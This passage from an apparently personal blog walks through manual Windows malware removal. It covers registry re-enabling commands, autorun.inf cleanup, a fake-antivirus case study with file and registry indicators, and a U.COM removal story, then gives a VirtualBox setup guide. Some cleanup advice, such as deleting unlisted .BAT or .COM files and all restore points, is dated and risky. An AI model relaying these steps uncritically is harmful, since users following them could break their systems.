iii. Regaining authority: Malware usually limits our privileges to make sure it is hidden or cant be detected. These include disabling task manager, Run, registry editor or disabling registry import etc. The next step is to regain control of our system.

a. In run type,

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

And run the command. This removes the entry in registry that had disabled registry editing. Now registry editing is allowed, though windows registry editor may still be disabled.

Note: Type the above command in a notepad and store it. Change extension to .bat , you get your own registry editing enabler tool!

b. Download the RatsCheddar tool and run it. This enables registry editor, task manager, folder options.

At this stage if you realise that restored defaults are altered once again to impose restrictions, this means malware is still active in memory. Repeat the identification and stop its execution.

iv. Removing supporting restart mechanisms: Now that malicious code isn’t active in memory, the next step is to remove its supporting mechanisms. Every malware once executed, makes sure that it is executed at least once on every system start up. This is achieved by entries in registry or modifying autoexec.bat or config.sys etc. Entries in registry are the most preferred option by malware, and we will go by it.

a. Many malware leave behind triggering files in drives that restarts the malware in full force once the drives are double clicked. They work by making a autorun.inf file linked to triggering malware file such that every time drive is autorun, the malware is triggered again. Our first priority is to remove such kind of start mechanisms.

Open my computer, go to folder options and enable view hidden files and folder, un-tick hide extensions of known file types & hide protected operating system files. Upon un-ticking hide protected operating system files, a confirmation is asked, confirm positive. Once finished, apply the settings. Now enter C: drive by address bar or by right clicking and explore. You will now see many files that were hidden earlier.

Check presence of any autorun.inf file. Open it by double clicking it (it wont hurt!!) and if readable, check what file was meant to be auto run.

Caution: There are many system files visible that are responsible for booting your system. Do not go on a random deletion spree, lest your system doesn’t boot again!! Some of the system files and folder are:

Autoexec.bat, config.sys, hiberfil.sys, pagefile.sys, IO.sys, MSDOS.SYS, boot.ini, NTDETECT.COM, ntldr and config.sys folder, system volume information folder, recycler folder etc.

Delete the file mentioned in autorun.inf file and also the autorun.inf file itself. Also delete anything like a folder of any name with an .exe extension. Also delete any other .BAT or .COM file other than those mentioned above. Repeat the process for all drives, opening each of them without double clicking them. In event of confusion, take help online, preferably on another system.

Entries at registry are made to make sure that malware executes at every system startup and stays in memory. Use the tool autoruns from sys internals to check start-up keys in registry. It lists all processes and files scheduled to be autorun at startup, in the logon tab. Search and delete any suspicious entries.

Another useful tool is HijackThis from trend micro. This tool lists all non windows processes starting at startup making it possible to have a clear picture of scenario. It has a tool called ADS scanner that can be used to detect Rootkits as well. All such malicious entries are to be simply deleted.

v. Finishing with cleaning all scrap: By this time you will know what had struck you. Search on net for more details regarding the infection and delete its sister files as well. Had there been any entries that were left ignored by you, delete them too, verifying them from net.

Clean all temporary files, type temp, %temp%, prefetch in run command (one at a time!)  and open the locations. Delete all files stored in them. Use Unlocker to unlock any locked files. Delete all cookies and other files in download folders. Go for a manual hunt in documents and settings folder and delete any last traces of infection.

Delete all previous system restore points, since they may be hiding infection.  Keep an antivirus handy. Restart your system now. Check startup time, verify task manager is working and check processes running in it. If all things work fine, congrats!! You just won the battle!!

Any cryptic error messages like file not found means start up entries for malicious code are still present though code is not. Simply run autoruns and in logon tab, search for a entry which has a file missing error besides it, simply delete it. Install a good antivirus and update it. Preferably re-install the web browser too.

Now that your system is malware free, make a commitment to her that now on you play clean, play safe. Keep updating your antivirus and be cautious online, avoid dirty sites, install an antivirus with site advisor, be extra cautious with removable media.

Hope you live happily hereafter!!

Note: A case study- Remove System security fake antivirus.

Due to popular demand noticed, I have posted the specific procedure to remove system security malware manually.

Kill processes:
Open Process explorer and kill the process named 1632575944.exe .  It may also carry some other number as name. Kill it, after you note the location it is executing from.

Delete registry values:

Open registry editor and delete the value. You may need to restore defaults using my restore default tool to enable registry editing and other defaults( Go to home page and download it from downloads section).
%UserProfile%HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “1632575944”

Else you can use the autoruns tool and delete this key from logon tab.

Delete files:

Search and delete the following files. You can use windows search too.
1632575944.exe, config.udb, init.udb, English.lng, German.lng, Spanish.lng, System Security.lnk

Delete directories:
c:\Documents and Settings\All Users\Application Data\538654387
c:\Documents and Settings\All Users\Application Data\538654387\Languages
C:\Documents and settings\All Users\Start Menu\Programs\System Security

Reboot and check if every thing is ok.

<< Check this post on pendrive based autorun viruses >>

New generation malware

Though I don’t like telling stories, this one is really adventurous and I suggest you reading it since its about an encounter with a deadly malware and I am the hero!

As I had described in my previous posts, the conventional way  of zeroing in on a virus, seemed to be really apt to me for all kinds. This was the same until I saw new viruses in my college digital library ( I would rather call it virus vault!). They were a breed apart, unlike normal viruses, they didn’t have any visible process running in task manager. This made it really tough to mark their presence in PCs. For a while I was tricked into believing that they didn’t exist on the PC and it had slowed down because of other issues. When I brought back home my pendrive, I noticed a new file U.COM in it, which didn’t execute thanks to my folder autorun.inf which is always present on my pendrive. Now I was sure the virus was present at college PCs, but didn’t have enough patience and time to go back there to try busting it, the place being public in nature.

A few days ago I was at my friends place, whose system gave a whole lot of problems ranging from slow start up, net getting disconnected, and browser hanging with errors. He was pleading to format his system and repartition it to remove any malwares hiding in other drives. FORMAT!!! The word I hate the most! I sat there with determination that its either the malware or me that’s getting screwed, and was able to ultimately fix it. Here is how I did it…..

  1. Opening task manager didn’t do much help since it showed no presence of any suspicious process.
  2. Upon opening a drive, it opened in a new window. This made me certain that some code was being executed prior to opening the drive, marking presence of an autorun.inf file, which will be super hidden.
  3. Initially I tried restoring registry defaults, but it didn’t worked, indicating malware was active and was monitoring registry changes and re-writing the malicious keys if original entries were restored.
  4. Since the only thing I was certain of was presence of a autorun.inf file, I went for the kill. Using killbox,  wrote address of file as C:\autorun.inf and was able to find the file and deleted it. Since killbox takes backup of deleted file in a folder in C: drive, I accessed the file. Opened it by double clicking it ( don’t be afraid, these files wont eat up your system when opened!). I found code to execute a U.COM file on drive autorun. This made me happy since I got another chance to take my old revenge with this guy!
  5. Using killbox, I gave instruction to delete the file C:\U.COM. I was able to find the file and deleted it. I repeated steps iv and v for all drives.
  6. To be certain to delete all files, I searched internet for details on malware named U.COM and was able to find what all files it creates. I deleted,




and delete the registry key-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cdoosoft C:\WINDOWS\system32\olhrwef.exe

  1. Having cleaned the mess, I restored windows registry defaults, entered each drive, created a dummy autorun.inf folder and deleted suspicious files as well. Also delete all files that killbox had taken backup after deleting. I deleted all files from all temp locations and using ccleaner, deleted the start up entries of U.COM. Search in registry editor for U.COM entries and delete them all. Usually there are other related entries in the same sub key, delete them too. Restart your system and check if every thing is OK.

The malware U.COM comes in the category of CLOAKED MALWARE, the new generation viruses. They run hidden from task manager, inside a back ground service, like svchost, along with other system processes. They write to other programs virtual memory, also called as process hijacking. They are packed and/ or encrypted to be invisible to our eyes. It is added as a Registry auto start to load Program on Boot up. It creates various files inside system32 folder and also in all drives and alters registry to hide its files from user.

PC slow and don’t see any reason why, beware, you could be a victim!!

Virtualised life

There are various occasions when we take a backseat in experimenting with new software, courtesy our fear of unstable windows. Not to mention our hesitance to try our hands on those colourful Linux distributions, debating if its really worth to spare a partition for the new OS. And after last dose of Bart’s PE, many brave guys must have burned a few not so good CDs and others fearing to risk a disk, not sure if their .ISO will work. And lets remember our biggest fear, reinstalling OS and all our programs due to various reasons. Have you ever thought if there is any one solution to all these problems?

To all those troubled guys, here is the single solution that fixes all your problems- Virtualization. Virtualization deals with creating various virtual machines under one single physical machine. The virtual machines share hardware resources with the physical machine.

The advantages of using virtual machines are numerous. You can install and run multiple operating systems(guests) on a single machine(host) and switch between them easily using the host machine without need to logoff from any of them. That means running vista, Ubunto, Fedora, Red hat etc in various windows under your windows XP!

Apart from that, you have the facility to create shared folders between the host and guest PCs, enabling data sharing. Install all your programs under the virtual XP and save its state. Always run virtual XP and in future if there is any issue with it, just switch back to the saved state on a click! Else install and use not frequently used and large programs like office suit etc in virtual XP to save your host registry from 20,000 entries.

Else just create a virtual PC, don’t install anything, and boot it from you Bart’s PE live windows CD or even through an ISO on your host HDD! Great way to test your live Windows before burning to CD.

There are various tools available in market that supports virtualization. From freeware to free to try ones. But the one I chose taking into account its functionality, ease of operation and cost (free!!!) is Sun Virtual box. Download the software from home site, some 30 Mb size.

Installation and usage:

Installation is easy and neat. After you install it, run the application. You are welcomed by the first run menu that directs you to creating a new virtual PC. Steps are given here under to set up a virtual PC.

  1. Click on New tab in welcome screen. This runs a virtual machine wizard to create a virtual machine.
  2. Set a name to the virtual machine and select the type of OS and its version you plan to install. Else select others and unknown version if you just want to make a virtual PC. Click next.
  3. Select the amount of RAM you can spare to your guest machine. The Rule of thumb is to assign 1/4th of net memory to the machine for a 512 MB machine, half of memory for 1 GB memory machines etc. Keep in mind not to starve your host PC for memory and to take care not to over assign memory to a single machine when you plan to install multiple machines. A machine to run Bart’s PE requires just 64 MB memory where as a XP machine requires at least 256 MB for guest machine and at least an equal amount for the host. When done, click next.
  4. Select the virtual hard disk. Since this is the first time, you need to create a virtual hard disk first. Click  new to enter the create VHD wizard. In hard disk type, select dynamic expanding type store since it is created quick and is advantageous. In a dynamic expanding storage, the actual amount of space occupied by the VHD on the host HDD isn’t equal to the set limit, but equal to the actual being used or required as of then. For example, when you create a 10 GB dynamic VHD, and install XP on it, it occupies just around 2-3 GB space and grows as guest claims disk space, till the specified limit is reached. Select type and click next.

Set the size depending on the OS you plan to install in the virtual  machine. Click finish to complete VHD wizard.

  1. Select the created VHD and click next and then finish to complete the virtual machine creation wizard.
  2. The virtual machine is created. Select the machine and go to settings. Here you can anytime alter the resource allocation of the virtual machine. Set video memory, boot order and snapshot( saved system state) location.
  3. In CD/DVD ROM tab, you can mount a bootable ISO or set your machine to boot from your optical drives. Also you can enable floppy drive, USB drives, network adapters etc.
  4. To create a shared folder, its location has to be set but it can be enabled once guest OS is installed by installing virtualbox guest additions on the guest OS. Procedure is described at later stage.

Installing guest OS:

Make sure you have enabled CD/DVD ROM in your virtual machine and insert the installation media in the optical drive. Start you virtual PC. It opens in a window, but looks the same way your pc would have behaved during XP installation. Proceed the same way as you do when installing XP on you physical PC. Don’t run any more applications on the host PC since it may create competition for memory and CPU usage.

NOTE: While in virtual machine window, your mouse pointer is grabbed inside it  and you need to press your right CTRL key to free your pointer. So, don’t panic!

Once finished installation, open XP. You may notice that only the virtual HDD is accessible and no contact be made to your host HDD. Now shared folders has to be set up to create data transfer channel between the physical and virtual PCs. Get out of virtual PC pointer hold and click on Devices tab on the running virtual machine window. Click install guest additions. A setup window pops up inside the virtual machine which sets up guest additions. After this, you have access to shared folder, and your mouse pointer isn’t grabbed anymore.

After setting shared folders, install software inside your virtual machine. When done, save its state to which your machine can be restored if it encounters any problem in future.

In a similar way, many virtual machines can be set up on a single host PC, depending on its hardware resources (memory mostly). Have a happy virtualization!!